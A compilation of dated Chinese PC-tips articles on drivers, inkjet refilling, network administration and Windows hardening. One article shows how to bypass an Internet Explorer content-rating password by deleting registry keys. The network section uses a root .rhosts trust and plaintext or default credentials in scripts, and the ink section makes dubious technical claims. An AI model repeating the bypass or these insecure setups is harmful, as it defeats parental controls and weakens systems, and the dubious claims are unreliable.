3.SiS(矽统)/ALi(扬智)
当前基于SiS芯片组的系统平台的重要驱动程序是SiS芯片组驱动包1.09版，其中包括AGP驱动和USB驱动，以及刚刚公布的r1.01.07版本IDE驱动。众所周知，(Ultra DMA) PCI IDE驱动一直是操作系统中不可缺少的驱动程序，主板的IDE磁盘性能发挥，完全由IDE接口驱动来决定，而SiS645芯片组在投放市场这么长时间后，却一直没有推出相应的IDE接口驱动程序，只能让用户采用操作系统自带的IDE控制器驱动来工作，这不得不说是一个遗憾。
在SiS的整合驱动包内曾经出现过IDE驱动，但是从109F版本之后，由于早期的IDE驱动并不适用于SiS961南桥芯片，如果强制安装之后，将会有严重的兼容性问题，因此SiS把它从整合驱动包内删除了。
而对ALi(扬智)芯片组而言，需要安装的驱动程序是ALi Integrated Driver(综合驱动工具包)及ALi AGP Utility(AGP工具)，它们目前的最新版本分别是1.07版和1.40版。这两款芯片组的综合驱动包里已经整合了需要安装的大多数驱动，因此在确保首先安装它之后再安装DixtctX即可。其它驱动程序可随后安装。
故障举例
一块麒麟(PCCHIP)M726主板，使用的是ALi公司的Aladdin Pro芯片组(北桥芯片为M1621，南桥芯片为M1543C)，搭配Intel Celeron 400MHz PCU。通过Ghost恢复系统并安装声显卡驱动软件后感觉开机速度极慢，1分钟左右才能进入桌面。
分析：该故障是未安装ALi芯片组驱动包而造成，安装驱动光盘中的驱动包后，开机速度明显加快，进入桌面只要30秒左右。
4.其它注意事项
(1)对于一些比较老的主板而言，请注意更新BIOS以更新CPU微代码及修正BUG。
(2)建议关闭一些不必要的设备(譬如暂时不会用到的串口和并口等)以提高速度。
(3)对于Windows NT、Windows 2000和Windows XP等操作系统而言，RAID的驱动应于系统安装开始时安装，进入系统后必须先于所有驱动程序之前安装最新版的Service Pack。
(4)当要重新安装显示卡驱动程序之前，一定要卸载原有驱动程序并重新安装DirectX。
(5)操作系统的某些组件要时时更新，建议在驱动程序安装结束后，可以通过Windows Update在网上取得最新的Windows组件，以提高系统的兼容性和稳定性。
我认为一心买硬件升级的人不能算是一个DIYer，至少不算是一个合格的DIYer，因为不会用计算机的人也知道花钱来获得更高的性能。所以，我认为只有尽可能从软件优化上来提高性能的人才算真正的DIYer。


喷打加墨技巧集锦

《一键清理系统垃圾》

喷打加墨技巧集锦

一、兼容墨水的选择
合格的喷墨打印机墨水要求具有超小的分子量，渗透率适中，一定的粘度比，化学输墨助动性及精密的化学合成顺序密码。只有达到上述条件时，墨水才能在喷头上顺利地受控喷打，才能保证打印精度。良好的喷墨墨水对化学合成时的技术要求是非常严格的，墨水化学成分不对，加注以后新墨水会与原残留墨水起化学反应生成胶状物或结晶物，这种故障几乎会立即令喷头报废。目前市场上兼容墨水品牌很多，不要以价格低作为选择标准，也不要轻信一些没保证的许诺。合格的兼容墨水应具有如下特点：
1.墨水的浓度很高，但分子量很小，具有良好的温度稳定性，较宽温度范围的良好流动性。
2.合成后的墨水化学性质稳定，能在很宽温度范围内长久存放，基本不出现粘度变化及结晶和沉淀物。
3.墨水色分子在化学合成时的化学合成密码能被喷头电极识别，使打印时墨水中的色分子的排列顺序及粘度适当，能受控于打印机的电信号，作到喷墨点精密同步，达到图文漂亮以及细部表现层次分明的效果。
4.对于纸张的要求不太高，可以打印普通纸；喷嘴内的墨水不易凝固，不阻塞喷嘴。
各种墨盒内的墨水因其制造商不同，其各项理化指标也不一样。墨盒内的原装墨水用完后，如果喷头还没损坏，是可以加墨继续使用的。但是如果使用质量不好的墨水或使用非喷墨专用墨水，可能会对打印机造成损害，一般表现在以下2点。第一，化学成分不合适的墨水，会腐蚀打印机喷头清洗泵吸嘴单元或在此单元上产生大量的结晶状污物，使喷头不能继续使用而损坏；第二、因墨水的密码不被喷头电极识别，会造成大量补充墨水吸入废墨收集器内，过早地造成机器污染。目前市场上有智河、神杰等品牌的兼容墨水，具备较高的可靠性。

二、为Epson墨盒加墨
爱普生的说明书上写明，墨盒取下后就不能再使用。这是由墨盒的特殊结构所致，若中途取下墨盒，会导致喷头管道中进入空气，从而在打印时引起断线。而且此时的断线要经数次清洗才能把空气抽出，所以Epson为了防止出现这种情况而用户又不会处理，才告诫用户墨盒取下后就不能再使用，以免用户随意取下墨盒。不过Epson的墨盒相对其它品牌的墨盒，在加墨时的技巧要求的确要高一些。这是由其喷嘴结构、墨盒结构及喷头的清洗方式等多种因素决定的，Epson喷墨打印机打印头设计成喷头墨盒分体式结构，而且只在墨盒出墨口上装了不锈钢超精细滤网，喷头上没装滤网，大多数故障都出在换墨盒以后和使用频率较高的打印机上。如选用兼容墨水进行灌注，一定要将空墨盒保存好，从机器上卸下来后要尽快用胶带纸将出墨口封住，以防灰尘进入。选择墨水时一定要选理化性能可靠的墨水，所用补充墨水决不能不同品牌混用。
Epson打印机的喷头除了在换墨盒时会带入空气，填充墨水时如果方法不当，也会带入空气。所以在加墨时，要缓慢注入，让墨水沉降到墨盒底部，不要在墨盒底部留有空气。 具体方法是：用随带的橡胶塞子将出墨孔堵住，或者用透明胶条将出墨孔封住（先将原封纸上的残墨拭干，一定要封死），揭开墨盒上面的封纸，可以看到每种颜色的墨室上面有2个孔（黑色墨盒就两个孔），有细小沟槽通出的是通气孔，另一个是注墨孔，有个别墨盒的注墨孔是用胶塞塞住的，这两个孔都可以注墨。加墨量以不超过海棉的容纳为限，加墨完毕，贴回封纸，注意不要将通气沟槽全封死，并注意排除底部海棉中的气泡。静置10分钟后，以胶条封出墨孔的，直接把墨盒放回打印机；用塞子封出墨孔的，去掉塞子，会有墨水渗出，以纸巾沾拭掉，快速放回打印机。注墨一定要平缓，让墨水沉到底部，过急易让空气留在底部，导致打印时出现断线。加墨的具体步骤如下：
1.将墨盒从打印机上拆下后，用不干胶纸封住出墨口，防止加墨时墨水从出墨口流出。
2.撕去墨盒上端的不干胶纸，露出注墨孔。
3.将墨水瓶的插针插入墨盒的注墨孔，缓缓注入墨水。墨盒的贮墨室分为前后2部分：前部是空的贮墨室，后部有注墨孔的部分是有海棉的贮墨室，在向有海棉的贮墨室中注墨时，不能将过多的墨水全部注入（因为墨水不能流入无海棉的贮墨室），剩下的墨水可以下次再加。
4.加满墨水后，用卫生纸吸干溢出孔的墨水，再贴上不干胶纸封住注墨孔。
5.拿起墨盒，其一端要压住出墨口，用力摇一摇。由于在向有海棉的贮墨室中注墨时，有些气体可能被封在海棉底部，不能全部排出，故如不摇动有可能打印不出。
6.撕去出墨口的胶纸，将墨盒装入打印机即可。
加墨时应注意以下3点：
1.注墨时如果出现很大阻力或漏墨现象，说明此打印头已损坏，不宜再使用；
2.注墨前应检查电路板有无氧化，并尽量在墨盒的墨水用完后马上注墨，以免喷墨头干涸。这一点尤其重要。
3.注墨准备工作都做好后再动手取下墨盒，决不能在墨盒取下后将喷头空置！

三、佳能墨盒的加墨法
Canon的BCI-21加墨是最简单的。把墨盒向前扳从喷头座中取下，倒过来，直接把墨水滴在出墨孔的海棉上，海棉的吸墨速度很快，至吸墨速度明显见慢时，就可以停止加墨了。只要注意不要加得过满，超出海棉的容纳能力。尤其对于BCI-21 Color三色墨盒，若加墨过满将导致溢出的墨水回流造成混色，那样墨盒就会因混色而报废。
佳能带喷头的墨盒，如黑色的BC-01/02/03，加墨的方法是用墨水随带的钻头插入通气孔的小眼略旋两圈，吃住力，轻轻拔出通气孔上的塞子，将注墨针头插入孔内注墨，注毕后将塞子压回。同样要注意不要加得太多。另外BC-03的墨盒有2种样式，有一种是侧面带一个透明的储墨室，室壁上的注墨孔用一个钢珠封住，它的加墨方法是，用随带的顶杆将钢珠压入储墨室，注毕墨水后用随带的新钢珠将注墨孔封住。
对Canon BJC-600系列的BJI-201墨盒，是四色独立的，加墨方法都是一样的。常见的加墨方法是在墨盒的储墨室壁上钻一个孔，注完墨水后用胶纸将孔封住。此法的不足是：墨水不能加满，且胶纸封口不易牢固，易渗墨。也可用长针头从出墨孔的海棉插进去，顶到海棉与储墨室间的隔板时，略用力刺穿隔板插入储墨室，出墨孔向上，将墨水挤入储墨室，挤的过程中松几次手，让空气回流，以利加快注墨。储墨室加满即可，墨水会自动渗入到海棉中去。

四、HP墨盒加墨法
HP的51645A/G墨盒底部有一个黑色的圆形贴纸，揭去贴纸，可见一个钢珠，用兼容墨水随带的塑料顶杆将钢珠压入墨盒，将一瓶墨水挤入墨盒后，用随带的C型夹夹住墨盒两侧，用力旋紧，将新钢珠压入孔内，松开C型夹，贴回贴纸，用纸巾沾拭喷嘴，墨水渗出通畅加墨即完毕。需要注意的是：压入钢珠封闭注墨孔前，一定要先夹紧墨盒，使压入钢珠后墨盒略呈负压，否则会引起喷嘴溢墨。
对于HP的51625A/G、51649A/G等墨盒加墨比较麻烦。需用专用的Ｕ型开启器，Ｕ型的内侧有两道刃口，将刃口对准墨盒上盖与墨盒的接缝处插入，慢慢向里推，即可将墨盒上盖起开。起开上盖后，可见3种颜色的三格墨室，每格有三个孔，在哪个孔加墨都可以，按颜色分别将墨水注入，以不超过海棉的容纳能力为度。然后盖回上盖，用胶条将上盖横向拦住固定。
HP还有一种带气囊的黑色墨盒如C1843A、51625A、51629A/G等几种，常用的加墨方法是在墨盒的上面钻一个孔，加完墨后用塞子堵上，然后再用注射器等调节气囊压力即可


喷打省墨技巧三例

《一键清理系统垃圾》

喷打省墨技巧三例

一、“假换墨”
EPSON的COLOR系列打印机其墨水耗用速度相当快。每次用完后，将COLOR系列打印机的原装墨盒取下来时，可看到其中剩余的墨水很多，轻轻挤压一下墨盒，有大量的墨水从底部刺穿的封口处流出，我们可以想办法将这些墨水使用尽。
EPSON COLOR系列打印机并不是通过探测墨盒中的墨水来计量墨水耗用量的，而是通过计算总的字符打印量来计量墨水用量的，而厂家为了保险起见，在墨盒中装的墨水比这个“计数器”额定的墨水耗用量要多得多。我们可以通过用“假换墨”的方法，将“计数器”置零，使原来的墨盒还能用来打印，只要其中确实还有墨水就行。
具体操作方法是：当打印机上的“墨尽指示灯”闪亮时，按下打印机面板上的“换墨按钮”，墨盒架会自行滑动到换墨位置，将其盖子揭开，但不要取出墨盒，然后再将墨盒架盖子关闭，再按下打印机面板上的换墨按钮，打印机开始执行充墨动作，待充墨完毕后，你会看到打印机操作界面中的墨量指示条又是满的了。现在你可以再次使用这个本该报废的墨盒了，“假换墨”后，墨盒中的墨水是可以全部消耗尽的，这样至少可以增加原来打印量的50％以上。
请注意“假换墨”后出现的问题是：当墨盒中的墨水真正耗尽后，不能用通常的方法更换墨盒。但可以按动清洗键，待墨盒架走到换墨盒位置时，强行关闭打印机电源，就可以像正常换墨那样掀起墨盒架盖子，取下空墨盒，这时先不要放新墨盒进去，再次接通打印机电源，这时打印机探测到没有墨水，“墨尽指示灯”会闪亮，接下来按照正常方法换墨就行了。
二、注入兼容墨水
尽管打印机厂商极力反对这样做，但这是省墨很重要的手法。其实大多数时候加墨后打印机的各项功能和性能均很稳定，与原装墨盒无二。加墨可按如下过程进行：
首先，准备一支大点的针筒和6号左右的长针头，再到电脑市场买一瓶合适的兼容墨水。当电脑发出缺墨警告后，打开打印机前盖，按下打印机上的墨盒按钮，使墨盒停在装卸位置，然后直接拔掉打印机电源插头。取下墨盒仔细观察，可见墨盒上有一个刚好能插入6号针头的小孔，用注射器通过此孔慢慢注入适量的兼容墨水（最好把墨盒灌满）即可。在注入墨水时，墨盒要保持竖立，可把墨盒连储存盒拿到便于操作的地方；墨水可分3、4次注入，到最后灌一点墨水就从墨盒的孔往上冒时，就可以确定墨盒已灌满。一般兼容墨水的价格仅为原装墨盒价格的1/4左右，可大大节约打印费用。
三、选择合适的打印质量
大家知道，喷打的耗墨量与其打印质量和分辨率成正比，应根据不同的应用要求选择不同的打印分辨率和打印质量。有时候这一点是非常重要的。比如佳能的BJC-210在使用“超经济模式”下，可以增加约3倍的打印量。平时我们自己看的稿子，完全可以采用降低打印质量的省墨模式。


破解IE分级密码

《一键清理系统垃圾》

破解IE分级密码

    可用编辑注册表的方法来找回密码，方法是在开始菜单的“运行”中键入“Regedit”命令打开注册表编辑器，随后找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Policies\Ratings主键，在此保存的键值就是IE属性对话框“内容”选项中的“分级审查”中的口令，右侧窗口中的“FileName0”和“Key”两个键值记录了该口令，且二进制的“Key”键值是经过加密的，去掉口令的方法是将Ratings下的这两个子键删除即可。以后再进入IE，就可以安全地进入分级审查了，并且可以跳过输入旧密码，直接输入新密码即可。


浅析系统网络管理经验之五大问题

《一键清理系统垃圾》

浅析系统网络管理经验之五大问题

一、网卡的安装问题

安装网卡的关键是：选择正确的网卡设备驱动，网卡的中断号和中断地址不能存在资源冲突。
可是笔者遇到：在WIN95中安装Dlink 10M即插即用网卡和TCP/IP协议后，用ping工具探测网关不通，探测自身网卡地址却正常。在控制面版->系统的设备管理中，发现网卡无资源冲突标记，驱动情况正常，用另一台工作正常的客户机来检查网线，网络通道也正常。进一步，检查网卡的资源分配情况，发现其中断号为12，取消其自动分配功能，手工设置其中断号，再ping网关，网通了。
原来，有些主版即插即用的功能不完善，给即插即用网卡分别了系统已占用的资源，在WIN95控制面版中检查网卡的配置情况却正常，造成假象。
以上的修改方法，对于PCI网卡，又不灵了，原因是不能手工设置PCI网卡的中断号。怎么办呢？在微机主板的CMOS中，去除中断12的即插即用分配，重启系统，让系统重新配置网卡资源，避开中断12的分配。

二、客户机上联口的快速定位

IP地址是Internet/Intranet网上主机通讯的逻辑地址，由用户手动设置或系统自动分配。局域网上若有两台主机IP地址相重，则两台主机相互报警，造成应用混乱。在校园网上，有几百台，甚至上千台主机上网，如何控制IP地址盗用呢？
采用Vlan虚网技术，可控制一段IP地址在某一Vlan中使用，而在其它Vlan中无效。但在同一Vlan的有效IP范围内，仍然会出现IP盗用。
我们利用3COM周边交换机记录上网网卡MAC地址的功能，从盗用IP的MAC地址追踪其客户机上联交换机的端口位置，然后禁止此端口的使用，并用行政手段对盗用者采取处罚措施，彻底根治IP盗用事件。具体方法如下：

1、建立合法的客户机IP-MAC对应数据库；
2、利用简单网络协议定期从NB2 3COM路由器中读取mib库地址1.3.6.1.2.1.3.1.1.2 中IP-MAC表，如下所示：IP地址202.112.162.2的MAC地址为00104B04B81A

1.3.6.1.2.1.3.1.1.2.129.1.202.112.162.1 = 08 00 02 1A 81 C3
1.3.6.1.2.1.3.1.1.2.129.1.202.112.162.2 = 00 10 4B 04 B8 1A
1.3.6.1.2.1.3.1.1.2.129.1.202.112.162.3 = 00 10 4B 04 B8 A5
1.3.6.1.2.1.3.1.1.2.129.1.202.112.162.5 = 00 10 4B 0D 71 08
1.3.6.1.2.1.3.1.1.2.129.1.202.112.162.12 = 00 10 4B 0D 70 CE

依照标准数据库，检查是否有新的MAC地址或IP-MAC不对应的MAC地址。若有，则执行下一步。

3、在二十几台交换机3COM SW1000中，读取mib库地址1.3.6.1.4.1.43.10.9.5.1.6.1 中的MAC地址表。下表为某台交换机记录的部分下联口网卡MAC表，第三口上联一台主机，第九口上联3台主机。

1.3.6.1.4.1.43.10.9.5.1.6.1.3.1 = 00 80 C8 78 53 8C
1.3.6.1.4.1.43.10.9.5.1.6.1.4.1 = 00 80 C8 E3 24 45
1.3.6.1.4.1.43.10.9.5.1.6.1.9.1 = 00 00 21 E7 00 9E
1.3.6.1.4.1.43.10.9.5.1.6.1.9.2 = 00 80 C8 E3 3D 52
1.3.6.1.4.1.43.10.9.5.1.6.1.9.3 = 00 00 21 E5 05 3F
1.3.6.1.4.1.43.10.9.5.1.6.1.24.1 = 00 80 C8 E3 58 60

找出此盗用IP的MAC地址出自哪台交换机的哪个端口，并发信通知网络管理员。

4、网络管理员确认后，禁止此交换机端口的使用。

另外，可以简化以上步骤， 将上述第三步，设计成CGI公共网关接口程序，根据用户反映的盗用IP地址或MAC地址，在Web网页上输入此地址，调用MAC定位的CGI程序，返回该MAC地址上联交换机端口的位置。

三、系统数据的备份

常采用磁带机来备份大容量数据，但对于少量的系统关键数据，用两台主机间硬盘备份更方便、灵活，如定时发电子邮件或用FTP将数据传至另一台机器上。备份时，应注意数据的安全性、可*性，如：防止网上数据的截获、防止已损害数据复盖原来备份的数据。我们在两台UNIX主机间，利用UNIX的信任关系，实现数据远程拷贝，将一台主机中的关键数据先加密，用cron定期将此数据拷贝到另一台主机。

具体方法如下：

1、建立机器B (hostb) 信任机器A (hosta)的信任关系。
在hostb主机的用户backdata根目录下建.rhost文件，内容为：hosta root。
表明hosta的root用户有权在hostb的用户backdata目录下进行远程操作。

2、在hosta中，编写远程拷贝Shell程序backdata.sh。将源文件按当前月份和星期几备份，备份数据每周复盖一次。

# /root/backdata.sh
month=`date +"%y%m"`
weekday=`date +"%a"`
rcp /root/db.dat backdata@hostb:db.dat.${month}
rcp /root/db.dat backdata@hostb:db.dat.${weekday}

3、在hosta中，用crontab -e设计定时操作：每天2点钟执行上述程序。

0 2 * * * /root/backdata.sh > > /root/backdata.log

四、Windows与Linux间的资源共享

1、从Windows共享linux资源

小红帽redhat 6.0中自带编译好的samba程序，提供samba文件共享服务。首先，设置配置文件/etc/smb.conf。如下所示，设置：本机的工作组或域名，netbios机器名，本地或NT域控制器口令认证方法；本地认证时，需要用命令/usr/bin/smbpasswd生成用户口令文件/etc/smbpasswd；设置共享目录：如film共享目录对应实际目录/disk1/film。

[global]
# workgroup = NT-Domain-Name or Workgroup-Name
workgroup = cauic
# netbios name = 机器名
netbios name = linuxzrm
# server string is the equivalent of
the NT Description field
server string = Linuxzou Samba Server
# security =用户认证方法：
本地认证（user）或域控制器认证（server）
security = user
; security = server
# 本地认证时，用此口令文件
smb passwd file = /etc/smbpasswd
encrypt passwords = yes
guest account = nobody
allow hosts = 202.112.162.
deny hosts = all
[film]
available = yes
path = /disk1/film

修改配置后，可用工具testparm测试此配置是否正常。然后，执行/etc/rc.d/init.d/smb start|restart启动或重启smaba服务（包括smbd和nmbd服务）。
现在，可以在windows下浏览cauic工作组下机器名为linuxzrm的共享资源。

2、从linux共享windows资源

利用linux的工具smbmount将windows下共享目录按smb文件系统，装载到本机目录下。下面的shell程序（需超级用户执行）表明，以用户名为zoup、口令为z12345身份，将windows服务器VOD下共享目录rmcontent，装载到本机/vodcontent目录下，安装点属于本机用户zou用户组staff。

# /home/zou/mountvod.sh
smbmount "//vod/rmcontent" -c ''mount /vodcontent
-u zou -g staff'' -U zoup%z12345

将以上命令放到系统启动文件中，系统每次启动后，会自动装载windows共享目录。如：在文件/etc/rc.d/rc.local中添加以下语句：

if [ -f /home/zou/mountvod.sh ]; then
echo mounting //vod/rmconten
/home/zou/mountvod.sh > > /home/zou/mountvod.log
fi

五、cisco路由器IP流量的获取

用cisco路由器作网际路由器时，一般都利用cisco的IP包过滤功能来统计IP流量。方法是在cisco路由器的每个出入口添加ip accounting output-packets命令，cisco路由器会自动统计这些端口的IP流量。
常用snmp或telnet终端仿真（show ip account）方法，获取IP流量。在Cisco IOS v.11以上版本中，提供了http服务器功能，用户可从WWW网页管理cisco路由器，不需要任何编程，即可很容易地采集IP流量，为了安全起见，还可限制访问服务器的客户机。方法如下：

Access-list 10 permit 202.112.162.5
Ip http server
Ip http access-list 10

在客户机202.112.162.5中，用网页下载工具wget定期采集、清除IP流量。方法如下：

#读取IP流量，存入outpu-packets网页文件中
wget --http-user=admin --http-passwd=cisco
http://cisco/exec/show/ip/accounting/output-packets

#清除采集过的IP流量
wget --http-user=admin --http-passwd=cisco
http://cisco/exec//clear/ip/accounting/CR

在网页outpu-packets中，读取标识符< pre >、

< /pre >之间的IP流量表，来实现统计IP流量。

Source Destination Packets Bytes
202.112.175.7 202.205.10.30 3 592
202.112.175.175 203.207.176.15 17 2000
202.112.168.22 202.96.44.134 1 40
202.112.164.5 202.103.134.58 1 40
202.112.175.201 202.114.98.12 3 430
202.112.164.151 202.96.49.1 6 279


巧消风扇噪音

《一键清理系统垃圾》

巧消风扇噪音

《中国电脑教育报》江梅春

    日前，我使用了五年的爱机突然出了点故障：电脑刚启动还是正常的，但过了二三十分钟，它就发出很大的嘈杂声，就像小发动机发动的声音，令人无法忍受。关机重启之后，故障照旧。

    仔细探究声音来源，怀疑是电源风扇缺油所致。打开机箱，将电源卸下，打开电源外盖，取下风扇，发现电源内灰尘很大，先用毛刷轻轻将灰尘拂去，再打开风扇的轴承，发现并不缺少机油，这说明噪音并不是缺油所致。仔细观察风扇，发现风扇框架的内壁上有一道长约1厘米的划痕，清晰可见，一定是某个塑料的风扇叶经过一段时间的转动，发热变形，触及内壁，发出噪音。于是拿一个刀片，在划痕处轻轻地刮了几下，意在增加扇叶与内壁之间的距离。照原样装好电源，装入机箱，开机启动，一切OK。


巧用Rundll32安装/卸载Windows程序

《一键清理系统垃圾》

巧用Rundll32安装/卸载Windows程序

   在Windows系统中安装和卸载程序是件非常容易的事情，一般用户通过安装和卸载程序向导就能很轻松地完成。但安装和卸载Windows程序还有些鲜为人知的小技巧，使用Rundll32命令安装和卸载Windows程序就是其中之一，可能你从来还没接触过，下面我们就一起领略它的神奇功能吧！

    提示：Rundll32.exe是 Windows系统提供的一个命令，它用来调用32位的DLL函数(16位的DLL文件用Rundll.exe来调用。DLL文件是Windows的基础，所有的API函数都是在DLL中实现的，它不能独立运行，一般由进程加载并调用，运行DLL文件最简单的方法是利用Rundll32.exe，它的命令格式是“Rundll32.exe 动态链接库名 函数名 参数名”。

    1.卸载微软Java虚拟机

    在Windows系统中，要想IE浏览器执行包含Java小程序的网页，必须安装微软Java虚拟机(MSJVM)，Windows 98/2000已经捆绑了MSJVM，Windows XP/2003中虽然已经剥离了微软Java虚拟机，但还是可以手工安装。不过，有个现实我们不得不面对：由于微软和SUN公司的明争暗斗，微软已经停止对MSJVM的开发，因此很多用户改用SUN公司提供的Java虚拟机。但微软没有提供MSJVM的卸载工具，使用Rundll32命令，我们可以轻松卸载MSJVM。

    单击“开始→运行”命令，在“运行”对话框中输入“RunDll32 advpack.dll,LaunchINFSection java.inf,UnInstall”，回车后系统会打开“Microsoft VM uninstall”对话框，单击“是(Y)”按钮后，系统就会开始卸载微软Java虚拟机，卸载完成后需要重新启动系统。

    接下来删除“%systemroot%”(即Windows的安装目录，Windows 2000系统为 Winnt目录，Windows XP/2003为Windows目录)下的Java文件夹；“%systemroot%inf”下的java.pnf文件，以及“%systemroot%system32”下的jview.exe文件和wjview.exe文件。最后打开注册表编辑器，依次展开[HKEY_LOCAL_MACHINESOFTWAREMicrosoftJavaVM]分支和[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerAdvancedOptionsJAVA_VM]分支，删除这两个分支下的所有子键。

    提示：以上方法不适用Windows 98系统。

    2.重新安装Windows XP自带的IE6.0

    Windows系统的IE浏览器漏洞很多，最容易出现问题。有时无法解决，就只能重新安装了。使用Rundll32命令可以很轻松地完成重新安装工作。我们以重新安装Windows XP中的IE6.0为例：

    首先将Windows XP光盘插入光驱，然后单击“开始→运行”命令，在“运行”对话框中输入“Rundll32 setupapi,InstallHinfSection DefaultInstall 132 C:windowsinfie.inf”命令，回车后系统会打开安装进程对话框，开始重新安装IE6.0。

    提示：如果你的Windows XP系统不是安装在C盘，请将 “C＼Windows＼Inf＼Ie.inf” 修改为“%systemroot%＼inf＼ie.inf”。

    3.卸载Windows Messenger

    卸载Windows Messenger的方法很多，最常用的就是修改“Sysoc.inf”文件，但此方法比较复杂，使用Rundll32命令能很轻松完成卸载：

    首先要确保已经关闭了Outlook和IE等Windows自带的组件，然后单击“开始→运行”，在“运行”对话框中输入“RunDll32 advpack.dll,LaunchINFSection %windir%infmsmsgs.inf,BLC.Remove”命令，回车后系统会打开一个卸载对话框，单击“是(Y)”按钮后，系统就开始卸载Windows Messenger 程序。

    以上只是简单介绍如何使用Rundll32命令卸载和安装Windows程序的几个实例，还有很多Windows程序的安装和卸载可以使用此方法，就不再详细介绍了，请大家慢慢体会。

作者：
来源：中国电脑教育报


巧用Windows“查找”命令

《一键清理系统垃圾》

巧用Windows“查找”命令

    Windows“开始”菜单中的“查找”命令功能强大，很好地使用能起到事半功倍的效果。以下是笔者使用“查找”命令的两点体会，现介绍给大家，希望能有所帮助。
    一、同时搜索多个磁盘
    当你依次单击“开始”→“查找”→“文件或文件夹”，打开“查找：所有文件”窗口后，在“搜索”下拉列表框中，如果你只是对欲进行搜索的范围进行选择，则只能选中单个磁盘或文件夹。其实，此时在单击“搜索”框后，你可以直接在此框中键入所要搜索的磁盘符，并在盘符间以“；”分隔，比如键入“A：；C：；D：”（实际键入的内容不含引号，下同），则你就可以同时在多个磁盘搜索你需要的文件了。为了进一步缩小搜索范围，你还可以在“搜索”框中键入路径，比如在其中键入“A：\Tools；C：\Windows；C：\dos；D：”。
    二、一次删除全部临时文件和后备文件
    大多数应用程序在运行时都生成临时文件和后备文件，在正常退出后有的应用程序能删除临时文件，有的则不能；若是非正常退出则临时文件残留在磁盘上。这些临时文件和后备文件散存在磁盘的各个文件夹中，不仅占用磁盘空间，还会降低磁盘的读写速度。删除这些垃圾文件往往搞得人晕头转向。在此，笔者介绍一下巧用Windows的“查找”命令一次删除这些文件的方法。
    首先，如上所述打开“查找：所有文件”窗口，然后在“搜索”下拉列表框中，选择要搜索的磁盘。因为临时文件一般以“tmp”为扩展名，后备文件一般以“bak”为扩展名，所以我们在“名称”框中，键入“＊.tmp　＊.bak”（注意：在两类文件名间要以空格或“＆”间隔）。现在，单击“开始查找”按钮，开始搜索，查找完毕，单击“编辑”菜单中的“全部选定”命令或直接使用快捷键“Ctrl＋A”，选中找到的所有文件，然后单击“文件”菜单的“删除”命令或直接按下Del键，系统弹出“确认删除多个文件”对话框，单击“是”按钮。至此，我们便成功删除了所有的临时文件和后备文件。


轻松解决多操作系统中的文件转换问题

《一键清理系统垃圾》

轻松解决多操作系统中的文件转换问题

    NTFS是基于Windows NT内核的高级文件系统，它提供了在所有FAT版本中都没有的高级功能，比如EFS(加密文件系统)、文件(夹)压缩、磁盘配额和压缩等等，在性能、安全性和可靠性方面都有很大的提高。那么，在多操作系统中进行FAT32和NTFS文件系统的相互转换会出现什么问题呢?下面看看大家的讨论：

    NTFS适合你吗?

    在多操作系统中是否选择将FAT32转换为NTFS，应该根据自己的情况来决定。如果重在性能和安全方面，那么可以将FAT32转换为NTFS；如果重在可操作性和兼容性方面，应该保持FAT32，不进行转换，因为支持FAT32的操作系统更多。而NTFS对Windows Me和以前的Windows版本并不兼容。建议除Windows XP/2003外的系统用FAT32。

    将FAT32转换为NTFS

    在Windows 2000/XP中，可以在命令提示符状态下键入“convert E:/FS NTFS”(假设E盘原来使用的是FAT32)，回车后，在下次重启时自动将E盘转换为NTFS文件系统。转换时最好整理一下磁盘碎片加快转换速度，并且把数据备份到其他不转换的分区中。

    将NTFS转换为FAT32

    将NTFS转换成FAT32相对比较复杂，在不需要旧的文件情况下，我们可以使用Windows 2000/XP的安装光盘来完成转换，在安装时，选择“用FAT文件系统格式化磁盘分区”。如果你需要保存原来的文件，可以用Partition Magic For DOS来转换，不过这种转换的速度比较慢，数据也容易丢失，因此强烈建议转换前备份好数据。

    转换问题多

    如果当前的磁盘分区已经采用了NTFS文件系统，而且已经保存了许多资料，包括加密的文件或文件夹，这时转换为FAT32就会出现加密文件无法访问的问题，而且因为两种文件系统采用的文件命名方式不同，在转换后文件名会出现问题。


全方位堵住Windows 2003的安全隐患

《一键清理系统垃圾》

全方位堵住Windows 2003的安全隐患

    尽管Windows 2003的功能在不断增强，但是由于先天性的原因，它还存在不少安全隐患，要是不将这些隐患“堵住”，可能会给整个系统带来不必要的麻烦；下面笔者就介绍Windows2003中不常见的安全隐患的防堵方法，希望能对各位带来帮助！

    堵住自动保存隐患

    Windows 2003操作系统在调用应用程序出错时，系统中的Dr. Watson会自动将一些重要的调试信息保存起来，以便日后维护系统时查看，不过这些信息很有可能被黑客“瞄上”，一旦瞄上的话，各种重要的调试信息就会暴露无疑，为了堵住Dr. Watson自动保存调试信息的隐患，我们可以按如下步骤来实现：

    1、打开开始菜单，选中“运行”命令，在随后打开的运行对话框中，输入注册表编辑命令“ergedit”命令，打开一个注册表编辑窗口；

    2、在该窗口中，用鼠标依次展开HKEY_local_machine＼software＼Microsoft＼WindowsdowsNT＼CurrentVersion＼AeDebug分支，在对应AeDebug键值的右边子窗口中，用鼠标双击Auto值，在弹出的参数设置窗口中，将其数值重新设置为“0”，如图1所示；

图1

    3、打开系统的Windows资源管理器窗口，并在其中依次展开Documents and Settings文件夹、All Users文件夹、Shared Documents文件夹、DrWatson文件夹，最后将对应DrWatson中的User.dmp文件、Drwtsn32.log文件删除掉。

    完成上面的设置后，重新启动一下系统，就可以堵住自动保存隐患了。

    堵住资源共享隐患

    为了给局域网用户相互之间传输信息带来方便，Windows Server 2003系统很是“善解人意”地为各位提供了文件和打印共享功能，不过我们在享受该功能带来便利的同时，共享功能也会“引狼入室”，“大度”地向黑客们敞开了不少漏洞，给服务器系统造成了很大的不安全性；所以，在用完文件或打印共享功能时，大家千万要随时将功能关闭哟，以便堵住资源共享隐患，下面就是关闭共享功能的具体步骤：

    1、执行控制面板菜单项下面的“网络连接”命令，在随后出现的窗口中，用鼠标右键单击一下“本地连接”图标；

    2、在打开的快捷菜单中，单击“属性”命令，这样就能打开一个“Internet协议(TCP/IP)”属性设置对话框；

    3、在该界面中取消“Microsoft网络的文件和打印机共享”这个选项；

    4、如此一来，本地计算机就没有办法对外提供文件与打印共享服务了，这样黑客自然也就少了攻击系统的“通道”。

    堵住远程访问隐患

